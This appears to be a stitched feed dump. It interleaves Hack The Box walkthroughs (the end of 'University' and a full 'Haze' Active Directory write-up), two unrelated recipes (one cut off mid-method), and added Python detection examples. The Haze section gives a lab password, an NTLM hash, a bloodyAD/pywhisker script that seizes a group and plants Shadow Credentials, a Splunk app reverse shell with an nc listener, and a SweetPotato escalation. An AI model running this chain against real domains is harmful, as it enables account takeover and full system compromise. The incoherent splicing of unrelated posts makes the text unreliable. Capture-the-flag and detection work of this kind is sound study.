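The DiskShadow script-mode run and the later NTDS.dit copy from the exposed drive leave a recognisable trail in process and script-block logs. The following is an added detection example, not code from the original write-up: the host names, the event records (shaped like command-line and PowerShell script-block logging output) and the copy command text are constructed, and the script body is reconstructed from the four lines the text describes.

```python
import re

# "diskshadow.exe /s <script>" : DiskShadow started in script mode.
SCRIPT_MODE_RE = re.compile(r'diskshadow(?:\.exe)?["\']?\s+.*?[/-]s\s+("[^"]+"|\S+)', re.I)
# "expose <alias> <drive>:" : a shadow copy mounted as a drive letter.
EXPOSE_RE = re.compile(r"^\s*expose\s+\S+\s+([a-z]):", re.I | re.M)
PERSISTENT_RE = re.compile(r"^\s*set\s+context\s+persistent\b(.*)$", re.I | re.M)
# Any path to ntds.dit, capturing the drive letter it is read from.
NTDS_RE = re.compile(r"\b([a-z]):\\\S*?ntds\.dit\b", re.I)


def analyze_script(text):
    """Summarise the traits of a DiskShadow script that matter for triage."""
    persistent = PERSISTENT_RE.search(text)
    return {
        "persistent": persistent is not None,
        "nowriters": bool(persistent and "nowriters" in persistent.group(1).lower()),
        "exposed": sorted({d.upper() for d in EXPOSE_RE.findall(text)}),
    }


def detect(events, scripts):
    """Flag script-mode DiskShadow runs and later ntds.dit reads from an exposed drive.

    events  : dicts with time, host, user, text (command line or script block)
    scripts : {lower-cased script path: contents}, as collected from the host
    """
    findings = []
    exposed_by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        host, text = ev["host"], ev["text"]
        match = SCRIPT_MODE_RE.search(text)
        if match:
            path = match.group(1).strip('"').lower()
            traits = analyze_script(scripts.get(path, ""))
            exposed_by_host.setdefault(host, set()).update(traits["exposed"])
            findings.append({"kind": "diskshadow_script_mode", "host": host,
                             "user": ev["user"], "script": path, **traits})
            continue
        for drive in NTDS_RE.findall(text):
            if drive.upper() in exposed_by_host.get(host, set()):
                findings.append({"kind": "ntds_read_from_shadow_copy", "host": host,
                                 "user": ev["user"], "drive": drive.upper()})
                break
    return findings


# Constructed sample data (hosts and the copy command text are hypothetical).
SAMPLE_SCRIPTS = {
    r"c:\zzz\diskshadow.txt": (
        "set context persistent nowriters\n"
        "add volume c: alias temp\n"
        "create\n"
        "expose %temp% z:\n"
    ),
}
SAMPLE_EVENTS = [
    {"time": "2025-01-01T10:00:00Z", "host": "DC-SAMPLE", "user": "brose.w",
     "text": r"diskshadow.exe /s c:\zzz\diskshadow.txt"},
    {"time": "2025-01-01T10:02:00Z", "host": "DC-SAMPLE", "user": "brose.w",
     "text": r"<copy command> Z:\Windows\NTDS\ntds.dit C:\dark\ntds.dit"},
    # Benign: interactive DiskShadow without a script file.
    {"time": "2025-01-01T09:00:00Z", "host": "FS-SAMPLE", "user": "backupsvc",
     "text": "diskshadow.exe"},
    # Benign: ntds.dit referenced on a host where nothing was exposed.
    {"time": "2025-01-01T09:05:00Z", "host": "FS-SAMPLE", "user": "backupsvc",
     "text": r"backup-agent.exe --include C:\Windows\NTDS\ntds.dit"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS, SAMPLE_SCRIPTS):
        print(finding)
```

The second finding only fires when the drive letter was exposed on the same host earlier, which keeps routine references to the live C:\Windows\NTDS path out of the results.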

Those files were downloaded to the local machine

Root flag view

We obtained the password hashes for the Administrator account

We can read the root flag by running the command type root.txt.

The post Hack The Box: University Machine Walkthrough – Insane Walkthrough appeared first on Threatninja.net.

Sheet Pan Veggies and Beans with Lemon Yogurt Sauce

By: Richa

High protein and fiber. Mix everything right in the pan meal, this Sheet pan roasted veggies and beans with Creamy Lemon Yogurt sauce, has amazing flavor and texture! Wrap it, bowl it, swipe with bread! So good! Gluten-free, options for soyfree, Nutfree

This is an easy, refreshing, spring and summer meal that you can put together within minutes. You make this amazingly refreshing lemon yogurt sauce and pair it with savory roasted veggies and crispy, crunchy beans that have been tossed in spices like paprika, coriander, black pepper, and garlic. They are crisp on the outside and tender on the inside.

The warm veggies and the cooling yogurt sauce are just fabulous together.

This is a veggie-heavy recipe rich in fiber, with over 14 grams per serving. It contains 15 to 25 grams of protein per serving, depending on the garnishes and non-dairy yogurt used. The protein in these sheet pan roasted vegetables comes from the beans, yogurt, sesame or hemp seeds, and even the vegetables. For an even more filling meal, serve with whole grain flatbread, pita, or naan.

You can pair them with the sauce in any way you like. You can put the sauce on a plate, top it with the roasted veggies, then top with some seeds and sprouts and a good squeeze of lemon juice. 

Or make a wrap with pita bread or naan bread. Just warm the bread, add the yogurt sauce, the roasted veggies, some more sauce, sprouts, cucumber, and a squeeze of lemon, then serve.

Sheet pan veggies and beans are absolutely delicious any which way you serve it. You can even make small tacos out of it!

Why You’ll Love Sheet Pan Veggies and Beans

  • super easy 1-pan meal celebrates delicious spring and summer veggies
  • tender-crisp roasted vegetables with crunchy roasted white beans
  • creamy, vibrant, 1-bowl lemon yogurt sauce
  • naturally gluten-free, soy-free, and nut-free

Continue reading: Sheet Pan Veggies and Beans with Lemon Yogurt Sauce

The post Sheet Pan Veggies and Beans with Lemon Yogurt Sauce appeared first on Vegan Richa.

Hack The Box: Haze Machine Walkthrough – Hard Difficulty

By: darknite
Reading Time: 17 minutes

Introduction to Haze

In this write-up, we’ll go step-by-step through the Haze machine from Hack The Box, rated medium difficulty. The box involves exploring a Windows Active Directory (AD) environment with Splunk services. The path includes abusing a Splunk vulnerability, moving through Active Directory, and escalating privileges to grab both the user and root flags.

Objective

The goal is to complete Haze by achieving the following:

User Flag:

Using the decrypted paul.taylor password (Ld@p_Auth_Sp1unk@2k24) from splunksecrets, I gained WinRM access as mark.adams. After enumerating AD with netexec and retrieving the Haze-IT-Backup gMSA NTLM hash, I used PyWhisker and Certipy for a Shadow Credentials attack on edward.martin. This provided edward.martin’s NT hash, enabling WinRM access to read the user flag with type user.txt. Troubleshooting BloodyAD authentication issues was key to progressing through AD exploitation.

Root Flag:

With Splunk admin credentials from a decrypted backup hash, I uploaded a malicious .tar.gz app containing a reverse shell to Splunk’s web interface (port 8000). The shell, caught via nc -lvnp 4444, had SeImpersonatePrivilege. Using SweetPotato, I escalated to NT SYSTEM and read the root flag with type root.txt. Fixing tar file upload errors ensured successful shell delivery.

Enumerating the Haze Machine

Reconnaissance

We begin with a basic Nmap scan to identify services on the machine:

nmap -sC -sV 10.10.11.61 -oA initial 

Nmap Output Highlights:

┌─[dark@parrot]─[~/Documents/htb/haze]
└──╼ $nmap -sC -sV 10.10.11.61 -oA initial 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-21 03:39 EDT
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.037s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-21 12:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
8000/tcp open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open  ssl/http      Splunkd httpd
|_http-title: 404 Not Found
8089/tcp open  ssl/http      Splunkd httpd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-server-header: Splunkd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

Analysis:

  • 53/tcp – DNS (Simple DNS Plus) for internal name resolution.
  • 88/tcp – Kerberos authentication (typical for AD environments).
  • 135/tcp – MS RPC endpoint mapper (useful for enumeration).
  • 139/tcp – NetBIOS session service (Windows file/printer sharing).
  • 389/tcp – LDAP (Active Directory query in plaintext).
  • 445/tcp – SMB service (file sharing, potential attack vector).
  • 464/tcp – Kerberos password change service (kpasswd).
  • 593/tcp – RPC over HTTP (potential for Active Directory related enumeration).
  • 636/tcp – LDAPS (LDAP over SSL/TLS).
  • 3268/tcp – Global Catalogue LDAP (multi-domain AD query).
  • 3269/tcp – Global Catalogue LDAPS (LDAP over SSL/TLS).
  • 8000/tcp – Splunk Web Interface (Splunkd httpd), web login portal exposed.
  • 8088/tcp – Splunk HTTP Event Collector (SSL).
  • 8089/tcp – Splunk management port (SSL), often used for Splunk API and administration.

Web Enumeration

Navigated to http://haze.htb:8000, which presented a Splunk Enterprise login page, indicating a web-based attack surface.

Visited http://haze.htb:8088, which returned a 404 error, suggesting no exploitable content.

Accessed http://haze.htb:8089, revealing a Splunk Atom feed that leaked the version (9.2.1), critical for identifying vulnerabilities.

Searched for Splunk 9.2.1 exploits, finding CVE-2024-36991, a local file inclusion (LFI) vulnerability allowing unauthorised file access.

The Splunk 9.2.1 authentication.conf documentation explains how Splunk manages user authentication. It defines how credentials are stored, including LDAP bindings, and supports integrating with external authentication systems. Misconfigurations here can expose sensitive data—like encrypted passwords and bindDNs—making it a critical target for exploitation during assessments.

Understanding CVE-2024-36991: A Simple Explanation

Think of your computer or phone as a house with many doors and windows. Each one is a way to interact with the device. Now, imagine one of the locks isn’t working properly—it looks secure, but a clever intruder could still get in.

CVE-2024-36991 is like that broken lock, but in software. It’s a hidden flaw that, if found by the wrong person, could let them sneak into the system without permission. They might steal data, cause damage, or disrupt how things work.

The good news is that once these flaws are discovered, the developers usually fix them quickly, like calling a locksmith to repair a faulty lock. That’s why it’s so important to keep your apps and devices updated. Updates are your best defence against these types of security issues.

Leveraging CVE-2024-36991 for Exploitation

Downloaded the CVE-2024-36991 PoC to test the LFI vulnerability

I downloaded the publicly available proof-of-concept (PoC) and tested it using curl to retrieve sensitive configuration files, such as authentication.conf

The exploit was successful and allowed access to /etc/passwd, dumping several user password hashes

Although hashcat didn’t crack the hashes within a 5-minute test, the PoC also revealed an encrypted bindDNpassword used in Splunk’s LDAP integration:

bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

Knowing that Splunk stores a symmetric key in splunk.secret, I used the same LFI to retrieve that key. With both the encrypted password and the key, I used the splunksecrets tool to attempt decryption.

Unlocking Splunk Credentials via splunksecrets

Installed Splunksecrets to decrypt the hash

Fixing Cryptography Module Reference in SplunkSecrets

Diagnosis:

  • Using Python 3.12, as per the traceback.
  • The cryptography.hazmat.decrepit module was deprecated in newer cryptography versions.
  • Ran pip show cryptography—found a version >36.0.0, where decrepit was removed.
  • Tested import: python3 -c "from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4" confirmed the error.

Downgraded cryptography to a compatible version

I’m currently facing a fairly common issue—it’s related to how a Python package references the cryptography library. In this case, the splunksecrets package is trying to import a module from cryptography.hazmat.decrepit, which doesn’t exist. The correct path should be cryptography.hazmat.primitives.

To fix this, I’ll need to manually edit the file located at:

/home/dark/.local/lib/python3.12/site-packages/splunksecrets/splunk.py

On line 6, the import statement needs to be corrected.

Current line:

from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4

Updated line:

from cryptography.hazmat.primitives.ciphers.algorithms import ARC4

Once that’s updated, it should resolve the issue.

The splunksecrets tool offers various commands to encrypt and decrypt passwords related to Splunk and its components. It supports decrypting and encrypting credentials used for database connections (dbconnect), as well as passwords associated with Phantom assets. The tool also provides functionality to handle passwords encrypted with both current and legacy Splunk algorithms. Additionally, it can generate password hashes compatible with Splunk’s authentication system. This versatility makes splunksecrets a useful utility for recovering sensitive information during security assessments involving Splunk environments.

I decrypted the encrypted LDAP password by running the splunksecrets tool with the Splunk secret file and the captured ciphertext. This process successfully revealed the plaintext password for the user paul.taylor as Ld@p_Auth_Sp1unk@2k24, which can be used for LDAP authentication or further privilege escalation.

Enumerate using the netexec command

Tested credentials on SMB and LDAP

Attempted WinRM access with paul.taylor, but it failed

Enumerated AD users to find other accounts

Manually extracting the username is tedious, so the screenshot above shows a quicker way I used to identify it.

Discovered mark.adams and tested the same password, gaining WinRM access

Successfully connected to the machine via evil-winrm.

Enumerating AD for Privilege Escalation

The easiest way to understand mark.adams’s connections is by using BloodHound.

The user mark.adams is a member of the gMSA Administrators group, granting access to retrieve and decrypt managed service account passwords from Active Directory. This privilege enables direct access to sensitive credentials (msDS-ManagedPassword), allowing privilege escalation or impersonation. It also opens paths for advanced attacks like NTLM relay or the Golden gMSA attack, which can provide persistent, stealthy access across the domain.

The details above display the properties of mark.adams.

I used a tool to connect to the target computer using the username “mark.adams” and the password I found. This confirmed that the credentials were correct and allowed me to access the system, which is running a recent version of Windows Server. The connection used standard network services to communicate securely with the target.

Bloodhound enumeration

The command executes BloodHound-python to collect Active Directory data using the machine account Haze-IT-Backup$. Instead of using a password, it authenticates with an NTLM hash (735c02c6b2dc54c3c8c6891f55279ebc)—a common technique during post-exploitation. The domain is specified as haze.htb, and the domain controller being queried is dc01.haze.htb, with the nameserver IP 10.10.11.61. The -c all flag instructs BloodHound to perform a full collection of all supported data types (such as sessions, ACLs, group memberships, etc.), and --zip compresses the output into a ZIP archive for easier ingestion into the BloodHound UI.

The machine account haze-it-backup$@haze.htb is a member of both support_services@haze.htb and Domain Computers@haze.htb groups. Membership in the Domain Computers group is standard for all domain-joined machines and typically grants basic permissions within the domain. However, its inclusion in the support services group may indicate elevated privileges or specific access rights related to IT support operations. This group membership may present an opportunity for privilege escalation, particularly if the support_services group has delegated permissions over high-value domain objects or privileged user accounts.

Attempted to retrieve gMSA NTLM hash, initially blank

I imported the Active Directory module and set the variable $gMSAName to “Haze-IT-Backup” and $principal to “mark.adams”. Then, I configured the managed service account so that the user mark.adams is authorised to retrieve the managed password.

You can also perform the same action using a one-liner command

We obtained the NTLM hash, but keep in mind that each user has a unique NTLM hash, so everyone will get a different one.

As shown by the results, the LDAP permissions now exceed regular permissions, allowing you to easily collect Domain Objects and DACLs, making enumeration straightforward for the user mark.adams.

BloodyAD and Pywhisker enumeration

An attempt to use BloodyAD for further exploitation failed due to invalid credentials, preventing successful authentication.

I had to rack my brain to figure out the issue, but after removing the $ from the Haze-IT-Backup username and running the ntpdate command, everything worked smoothly.

I also executed the BloodyAD commands displayed earlier to assign permissions and add group memberships to the Haze-IT-Backup account.

These commands attempt to escalate privileges by granting the Haze-IT-Backup account full control (genericAll) over the SUPPORT_SERVICES group and adding the service account as a member of that group.

I also ran a series of PyWhisker commands to manage permissions for the user edward.martin using the Haze-IT-Backup$ account:

pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "list"

The initial listing showed that the msDS-KeyCredentialLink attribute was empty or inaccessible.

pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "add"

This generated a certificate and key, updated the msDS-KeyCredentialLink attribute for edward.martin, and saved a PFX certificate file protected by a password. This certificate can be used to obtain a Ticket Granting Ticket (TGT) with external tools.

pywhisker -d haze.htb -u Haze-IT-Backup$ -H unique --target edward.martin --action "list"

This showed the new DeviceID and its creation timestamp.

#!/bin/bash

# Variables - replace with actual values
IP="10.10.11.61"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASSWORD=":YOUR_PASSWORD_HERE"
TARGET_USER="edward.martin"
HASH=""  # Set this at runtime or before running commands

# Change owner of SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 set owner 'SUPPORT_SERVICES' "$USER"

# Grant $USER GenericAll over the SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 add genericAll "SUPPORT_SERVICES" "$USER"

# Add user as member of SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 add groupMember 'SUPPORT_SERVICES' "$USER"

# Prompt user to enter the hash at runtime if empty
if [ -z "$HASH" ]; then
  read -r -p "Enter the NTLM hash: " HASH
fi

# List KeyCredentialLink attribute for target user
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "list"

# Add KeyCredential to target user
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "add"

# Confirm KeyCredentialLink attribute update
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "list"

I utilised an existing script to automate the execution of all the necessary commands, streamlining the process and ensuring accuracy during exploitation.

I used impacket-getTGT to request a Kerberos Ticket Granting Ticket (TGT) for the Haze-IT-Backup$ account on the haze.htb domain, authenticating with the NTLM hash instead of a plaintext password. After successfully obtaining the ticket, I set the KRB5CCNAME environment variable to point to the ticket cache file, allowing subsequent Kerberos-authenticated actions to use this ticket.

Gaining Access as edward.martin

The image reveals that Haze-IT-Backup$ can modify the Owner attribute of the SUPPORT_SERVICES object. Notably, SUPPORT_SERVICES holds the privilege to issue certificates on behalf of the EDWARD account. This chain of permissions enables a classic Shadow Credentials attack. To exploit this path, the first step is to leverage the DACL misconfiguration on SUPPORT_SERVICES to gain control over the object and escalate privileges accordingly.

I used Certipy to perform an automated Shadow Credentials attack targeting the user edward.martin. By authenticating Haze-IT-Backup$ with the NTLM hash, Certipy generated and added a temporary Key Credential (certificate) to edward.martin’s account. This allowed the tool to authenticate edward.martin using the certificate and obtain a Ticket Granting Ticket (TGT). After successfully retrieving the TGT and saving it to a credential cache file, Certipy reverted the Key Credential changes to avoid detection. Finally, the tool extracted the NT hash for edward.martin, which can be used for further attacks or lateral movement.
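Each directory write in this chain (the gMSA retrieval-principal change, the owner change on SUPPORT_SERVICES, and the Key Credential that is added to edward.martin and then reverted) is recorded as Security event 5136 when directory service change auditing and a matching SACL are in place. The following is an added detection example, not part of the original write-up: the event records, distinguished names, allow-listed writer and ten-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Attributes (lower-cased LDAP display names) behind the steps in this write-up.
WATCHED = {
    "msds-groupmsamembership": "gMSA password-retrieval principals changed",
    "ntsecuritydescriptor": "owner or DACL changed",
    "msds-keycredentiallink": "key credential written (Shadow Credentials)",
}
# OperationType values used by event 5136.
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"

# Assumptions for this example: one service account is expected to write key
# credentials, and an add followed by a delete within 10 minutes is a revert.
ALLOWED_WRITERS = {"svc-whfb-sync"}        # hypothetical account name
REVERT_WINDOW = timedelta(minutes=10)


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect(events):
    """Return findings for watched attribute writes and add-then-remove reverts."""
    findings = []
    pending = {}  # (writer, target DN) -> time the key credential was added
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev.get("EventID") != 5136:
            continue
        attr = ev["AttributeLDAPDisplayName"].lower()
        writer = ev["SubjectUserName"].lower()
        if attr not in WATCHED or writer in ALLOWED_WRITERS:
            continue
        when, target, op = _ts(ev["TimeCreated"]), ev["ObjectDN"], ev["OperationType"]
        base = {"time": ev["TimeCreated"], "writer": writer,
                "target": target, "attribute": attr}
        if op == VALUE_ADDED:
            findings.append({**base, "reason": WATCHED[attr]})
            if attr == "msds-keycredentiallink":
                pending[(writer, target.lower())] = when
        elif op == VALUE_DELETED and attr == "msds-keycredentiallink":
            added = pending.pop((writer, target.lower()), None)
            if added is not None and when - added <= REVERT_WINDOW:
                findings.append({**base, "reason":
                                 "key credential added and removed by the same "
                                 "writer within the window"})
    return findings


def _ev(time, writer, dn, attr, op, event_id=5136):
    return {"EventID": event_id, "TimeCreated": time, "SubjectUserName": writer,
            "ObjectDN": dn, "AttributeLDAPDisplayName": attr, "OperationType": op}


# Constructed sample events; the DNs are illustrative, not taken from the box.
GMSA = "CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb"
GROUP = "CN=Support_Services,CN=Users,DC=haze,DC=htb"
EDWARD = "CN=Edward Martin,CN=Users,DC=haze,DC=htb"
SAMPLE_EVENTS = [
    _ev("2025-06-21T12:20:00Z", "mark.adams", GMSA, "msDS-GroupMSAMembership", VALUE_DELETED),
    _ev("2025-06-21T12:20:00Z", "mark.adams", GMSA, "msDS-GroupMSAMembership", VALUE_ADDED),
    _ev("2025-06-21T12:25:00Z", "Haze-IT-Backup$", GROUP, "nTSecurityDescriptor", VALUE_ADDED),
    _ev("2025-06-21T12:30:00Z", "Haze-IT-Backup$", EDWARD, "msDS-KeyCredentialLink", VALUE_ADDED),
    _ev("2025-06-21T12:30:07Z", "Haze-IT-Backup$", EDWARD, "msDS-KeyCredentialLink", VALUE_DELETED),
    # Ignored: allow-listed writer, unrelated attribute, unrelated event ID.
    _ev("2025-06-21T12:40:00Z", "svc-whfb-sync", EDWARD, "msDS-KeyCredentialLink", VALUE_ADDED),
    _ev("2025-06-21T12:41:00Z", "helpdesk1", EDWARD, "description", VALUE_ADDED),
    _ev("2025-06-21T12:42:00Z", "mark.adams", "", "", "", event_id=4624),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["time"], finding["writer"], finding["attribute"], "->", finding["reason"])
```

The add-then-remove finding covers the automatic clean-up described above: the revert itself is a second 5136 record, so it narrows the search rather than hiding the change.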

I used evil-winrm to connect to the target machine as edward.martin, authenticating with the NT hash I had previously extracted. This granted me an interactive WinRM session with the privileges of edward.martin, allowing direct access to the system for further enumeration or exploitation.

We can read the user flag by simply running the command type user.txt inside the WinRM session.

Escalate the Root Privileges Access

Privileges Access

While exploring the system, I navigated to C:\Backups\Splunk and found a backup file named splunk_backup_2024-08-06.zip. I downloaded the file for offline analysis using the download command in Evil-WinRM.

Analyse the Splunk_backup file

After downloading splunk_backup_2024-08-06.zip, I extracted its contents locally to analyse the files inside.

It appeared to be a standard Splunk directory structure.

It turned out that Splunk had created a copy of the active configuration file, which contained the hash above.

An error occurred while attempting to use splunksecrets.

By running splunksecrets splunk-decrypt -S etc/auth/splunk.secret, I was able to decrypt the ciphertext

There was no user account associated with this password, resulting in a STATUS_LOGON_FAILURE during login attempts.
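The backup could be decrypted offline because it carried both the encrypted setting and the key file. As an added example (not part of the original post), this audit reports whether an archive contains etc/auth/splunk.secret alongside .conf values marked with Splunk's `$1$` or `$7$` encrypted-value prefixes. The archive layout, stanza and values in the sample are constructed.

```python
import io
import re
import zipfile

# A .conf line whose value carries Splunk's "$1$" or "$7$" marker, i.e. a
# setting stored encrypted with the instance's splunk.secret.
ENCRYPTED_SETTING = re.compile(
    r"^[ \t]*([A-Za-z0-9_.-]+)[ \t]*=[ \t]*\$[17]\$\S+", re.MULTILINE)
SECRET_SUFFIX = "etc/auth/splunk.secret"


def audit_splunk_archive(zip_bytes):
    """Report whether an archive holds both splunk.secret and encrypted settings."""
    secret_files, encrypted_settings = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            name = info.filename.replace("\\", "/")
            if name.lower().endswith(SECRET_SUFFIX):
                secret_files.append(name)
            elif name.lower().endswith(".conf"):
                text = archive.read(info).decode("utf-8", errors="replace")
                for match in ENCRYPTED_SETTING.finditer(text):
                    # Record file and key name only, never the value itself.
                    encrypted_settings.append((name, match.group(1)))
    return {
        "secret_files": secret_files,
        "encrypted_settings": encrypted_settings,
        # Ciphertext plus key in one readable archive means anyone who can
        # read the archive can recover the plaintext.
        "decryptable_offline": bool(secret_files and encrypted_settings),
    }


def build_sample_archive(include_secret=True):
    """Build a constructed stand-in for a Splunk backup zip, in memory."""
    conf = ("[example_ldap]\n"
            "bindDN = CN=svc-example,DC=example,DC=test\n"
            "bindDNpassword = $7$Q09OU1RSVUNURUQtU0FNUExF\n")  # constructed value
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Splunk/etc/system/local/authentication.conf", conf)
        archive.writestr("Splunk/etc/system/local/server.conf",
                         "[general]\nserverName = example\n")
        if include_secret:
            archive.writestr("Splunk/etc/auth/splunk.secret",
                             "CONSTRUCTED-NOT-A-REAL-SECRET\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(audit_splunk_archive(build_sample_archive()))
```

A positive result means the backup location needs the same access control as the live Splunk installation, and any credential it exposes should be rotated.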

Uploading a malicious zip file to get a shell

I tested this password by logging into the previously discovered website.

The login attempt was successful, confirming the password’s validity.

This means accessing and reviewing the part of the system where applications or services are controlled and configured. It involves looking at how apps are set up, what permissions they have, and possibly making changes to their settings.

Before proceeding, I conducted research to understand how to leverage the admin access effectively.

I then proceeded to use a reverse shell tool from this repository to gain remote shell access on the Splunk system.

I downloaded the reverse shell tool repository directly onto the target machine to prepare for the next steps.

The content matches the example shown above.

I added the reverse shell command to the appropriate script file.

The attempt to create (zip) the archive file failed.

I started a listener on my machine to catch the incoming reverse shell connection.

An attempt to upload the tar file through the app’s interface resulted in an error stating that the application does not exist.

I modified the reverse shell command to address the issues encountered.

This time, the zip file was created successfully without any issues.

The file was successfully uploaded to the application.

I successfully received the reverse shell connection from the target.

Exploiting SeImpersonatePrivilege with SweetPotato

The current user has the SeImpersonatePrivilege permission enabled, as shown above. This privilege is commonly exploited using tools like Juicy Potato to escalate to NT SYSTEM.

Privilege Escalation to Alexander Green

The user alexander.green@haze.htb is a member of multiple Active Directory groups, including splunk_admins@haze.htb, Domain Users@haze.htb, and users@haze.htb. The splunk_admins group likely grants administrative privileges over the Splunk environment, which could provide access to sensitive logs, configurations, or even execution capabilities within Splunk. Additionally, being part of the Domain Users group confirms that the account is a standard domain-joined user. The users group, which includes Domain Users as members, may be used to manage or apply policies to a broader set of accounts. This nested group membership structure could potentially be leveraged to escalate privileges or pivot further within the domain, depending on the permissions assigned to each group.

I downloaded the SweetPotato binary to the target machine to leverage the SeImpersonatePrivilege for privilege escalation.

I tested SweetPotato by running it with the whoami command, confirming that privilege escalation to NT SYSTEM was successful.

Using this privilege escalation method, I gained NT SYSTEM access and was able to read the root flag.

The post Hack The Box: Haze Machine Walkthrough – Hard Difficulty appeared first on Threatninja.net.

Aloo Matar (आलू मटर) | Potato Peas curry - Winter Special

Come winter, the market is flooded with fresh vegetables which are very tempting. Most of the time, I will hoard my fridge with the fresh produce and then struggle to consume it before the freshness withers away.

Winters at home mean fresh green peas, carrots, cauliflower and radish in abundance. Of course the evergreen doodhi, aka lauki, makes its presence in the menu at least once a week.


Aloo mutter is easy and simple to make, but packed with a riot of flavors. You can make it with fresh peas or the frozen ones. Try to avoid dried peas, which need to be soaked overnight. In my opinion, the dried peas don't blend well into the curry.

In winter, I make this curry with fresh peas, and during the off season the frozen peas come in handy. We can easily make this Aloo Matar gravy for year-end parties, get-togethers and office potlucks.


I learnt this recipe from my amma. She used just simple basic spices to make this curry, and it would be served with piping hot fulkas just off the pan. I enjoy it with some thick yogurt or cucumber raita, while hubby loves it with onion raita.

Kulchas and naan are a great combination too, and if serving with rice, simple steamed basmati rice, jeera rice, peas pulav or vegetable pulao are the perfect pairing.

I use the pressure cooker to make it and it gets done quickly. A pressure cooker or Instant Pot is the best choice if we want to make a large quantity of Aloo Matar.

Do not forget to use lots and lots of fresh coriander as garnish. It enhances the flavor of the gravy. Serve with some chopped onions and a wedge of lime.


Preparation Time - 10 mins
Cooking Time - 30 mins
Complexity- easy
Serves - 2 to 3 

Ingredients
3 to 4 medium sized potatoes, peeled & cut into big cubes
1 medium onion, chopped roughly
2 tomatoes, roughly chopped
1 cup green peas
2 green chillies, finely chopped
Lots of fresh coriander
1 tsp ginger garlic paste
1 tsp Kashmiri chilli powder
1/2 tsp turmeric / haldi
1/2 tsp kasuri methi / dehydrated fenugreek leaves
3 tsp oil
Salt as needed
Whole spices
1 tsp jeera / cumin
Small piece cinnamon / dalchini
3 cloves / lavang
2 cardamom / elaichi





Method

  • Heat oil in a pressure cooker.
  • Crackle the cumin seeds, followed by the whole spices, until you get a nice aroma of fried spices. Take care to roast over a low flame; that is the key to bringing out the essence of the whole spices.
